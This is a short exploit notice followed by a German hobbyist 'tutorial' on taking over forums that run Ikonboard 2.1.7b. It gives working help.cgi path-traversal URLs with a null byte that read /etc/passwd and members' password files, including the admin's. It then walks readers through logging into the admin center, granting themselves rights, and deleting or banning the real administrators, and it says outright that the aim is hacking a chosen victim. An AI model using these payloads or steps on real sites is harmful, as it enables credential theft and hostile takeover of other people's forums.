Exploit: --------- vulnerable: Ikonboard.com ikonboard 2.1.7b und Vorgänger - Sun Solaris 8.0 - S.u.S.E. Linux 7.0 - RedHat Linux 7.0 - OpenBSD OpenBSD 2.8 - NetBSD NetBSD 1.4.3 - Microsoft Windows NT 4.0 - Microsoft Windows 2000 - MandrakeSoft Linux Mandrake 7.2 - IBM AIX 4.3.3 - HP HP-UX 11.11 - FreeBSD FreeBSD 4.2 - Digital (Compaq) TRU64/DIGITAL UNIX 5.0 - Debian Linux 2.2 - Connectiva Linux 6.0 - Caldera eServer 2.3 - BSDI BSD/OS 4.0.1 Erste Erscheinung: 11 März, 2001 English: ------------ Example: http://www.example.com/cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/passwd%00 will disclose /etc/passwd, if readable by the webserver. http://www.example.com/cgi-bin/ikonboard/help.cgi?helpon=../members/[member].cgi%00 discloses the ikonboard account password for [member], including admin acounts. Deutsch: ------------ Hi again! Vor euch habt ihr wieder ein neuer Tutorial. Heute geht es darum wie ihr ganz leicht Ikonboards hackt. Alles was wir dafür brauchen ist ein Opfer (ein Ikonboard in der Version "v2.1.7b", bei dem die "help.cgi" noch nicht gepatched wurde [wie ihr das rauskriegt? einfach testen ob der trick funzt ;)]), und dieses Exploit: help.cgi?helpon=../members/.cgi%00 Wobei "" durch den Namen des Admins ersetzt wird. ;) So könnte sowas zum Beispiel aussehn: www.blabla.de/cgi-bin/ikonboard/help.cgi?helpon=../members/Admin.cgi%00 Und schwupps sehen wir sein Passwort. Nun gehen wir ins Admincenter. (url könnte zum Beispiel folgende sein: www.blabla.de/cgi-bin/ikonboard/admincenter.cgi Dort können wir eine Menge am Board verändern, uns Adminrechte verschaffen (vorrausgesetzt wir sind auf dem Board registriert ;)), und ganz einfach die echten Admins vom Board löschen oder Bannen damit wir die volle Kontrolle haben :), klingt das nicht Spitze?? Es liegt jetzt an euch, denn hier endet ein weiterer Tutorial von mir! cya broodchris brood_chriz@gmx.net ps: dieses exploit funktioniert NUR bis Version 2.1.7b !! ein danke geht an securityfocus für diesen bug!! visit my page at http://broodchris.da.ru